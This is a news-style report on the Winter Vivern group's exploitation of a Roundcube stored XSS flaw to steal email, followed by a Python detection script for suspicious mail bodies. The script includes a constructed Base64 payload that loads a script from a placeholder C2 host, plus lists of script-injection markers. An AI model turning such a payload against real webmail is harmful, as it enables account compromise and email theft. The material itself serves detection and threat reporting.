On October 11, 2023, the threat actor group known as Winter Vivern was detected exploiting a zero-day vulnerability in Roundcube webmail software, allowing them to harvest sensitive email messages from targeted accounts.

According to ESET security researcher Matthieu Faou, the group has elevated its offensive by leveraging a newly discovered flaw in Roundcube. Previously, Winter Vivern focused on exploiting known vulnerabilities in both Roundcube and Zimbra, where exploit code was publicly available, but this new approach marks a significant escalation.

Winter Vivern, also referred to as TA473 and UAC-0114, aligns its objectives with the geopolitical agendas of Belarus and Russia. In recent months, the group has been implicated in attacks against entities within Ukraine and Poland, as well as government organizations across Europe and India.

Additionally, the group exploited another Roundcube vulnerability (CVE-2020-35730) in prior months, making it only the second nation-state-aligned group, after APT28, known to target this open-source webmail application.

The recent vulnerability is tracked as CVE-2023-5631 (CVSS score: 5.4) and is classified as a stored cross-site scripting (XSS) flaw that permits a remote adversary to inject arbitrary JavaScript code. A fix was issued on October 16, 2023.

Winter Vivern's attacks begin with a phishing message that embeds a Base64-encoded payload within the HTML body. Once decoded, the payload injects JavaScript fetched from a command-and-control (C2) server, exploiting the XSS vulnerability.

Faou elaborates, stating, “These specially crafted email messages allow attackers to load arbitrary JavaScript code directly into the Roundcube user’s browser window, requiring no manual interaction apart from simply viewing the message.”

The second-stage script (checkupdate.js) acts as a loader, enabling the execution of a subsequent JavaScript payload targeting the exfiltration of email messages to the C2 server. Despite the relative simplicity of the group’s tactics, the persistent nature of their phishing campaigns poses a significant threat, particularly to governmental institutions in Europe, many of which deploy internet-facing applications containing known vulnerabilities that are not routinely updated.
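The two technical details above (a Base64 blob hidden in the HTML body that decodes to a script injection, and a second-stage loader named checkupdate.js) are enough to write a simple mail-gateway check. The following Python is an added detection example, not code from ESET or from the article: it pulls Base64-looking runs out of an HTML body, strictly decodes them, and flags any that decode to script markers, while leaving an inline Base64 image alone. Both sample messages, the C2 hostname `c2.example.invalid`, and the marker list are constructed for illustration.

```python
import base64
import binascii
import re
from typing import List, Optional

# Constructed sample messages (hypothetical; not captured from the campaign).
# Benign: an inline base64 PNG that a naive "any base64 is bad" rule would misfire on.
BENIGN_HTML = (
    "<html><body><p>Quarterly report attached.</p>"
    '<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ'
    'AAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=="></body></html>'
)
# Suspicious: a base64 attribute value that decodes to a reference to the loader filename
# named in the article; the host c2.example.invalid is a placeholder.
_ENCODED = base64.b64encode(
    b"<script src='https://c2.example.invalid/checkupdate.js'></script>"
).decode("ascii")
SUSPICIOUS_HTML = (
    f'<html><body><p>Please review.</p><div data-x="{_ENCODED}"></div></body></html>'
)

# Runs of base64 alphabet characters long enough to carry a payload (short tokens are noise).
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Markers that have no business in a rendered mail body, checked on the raw HTML.
RAW_MARKERS = [re.compile(p, re.I) for p in (r"<script\b", r"\bon[a-z]+\s*=", r"javascript:")]
# Markers checked inside decoded blobs (lowercased); checkupdate.js is the loader from the article.
DECODED_MARKERS = ("<script", "javascript:", "eval(", "document.cookie", "checkupdate.js")


def decode_base64_candidate(blob: str) -> Optional[bytes]:
    """Strictly decode a candidate run; anything that is not valid base64 is ignored."""
    if len(blob) % 4:
        return None
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def decoded_indicators(data: bytes) -> List[str]:
    """Return the script markers present in a decoded blob (binary data yields none)."""
    text = data.decode("utf-8", errors="ignore").lower()
    return [marker for marker in DECODED_MARKERS if marker in text]


def scan_email_html(html_body: str) -> dict:
    """Scan one HTML mail body; verdict is 'suspicious' on any raw or decoded script marker."""
    raw_hits = [p.pattern for p in RAW_MARKERS if p.search(html_body)]
    findings = []
    for blob in BASE64_RE.findall(html_body):
        data = decode_base64_candidate(blob)
        if data is None:
            continue
        hits = decoded_indicators(data)
        if hits:
            findings.append({"blob_prefix": blob[:16] + "...", "indicators": hits})
    verdict = "suspicious" if (raw_hits or findings) else "clean"
    return {"raw_hits": raw_hits, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_HTML), ("suspicious", SUSPICIOUS_HTML)):
        print(label, scan_email_html(body))
```

Run this after MIME decoding (quoted-printable or base64 transfer encoding stripped), otherwise the whole body is one Base64 run and the per-blob logic never sees the embedded payload. The strict `validate=True` decode and the 24-character minimum keep false positives from random alphanumeric tokens low; the marker list is deliberately short and should be tuned to the webmail product in use.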
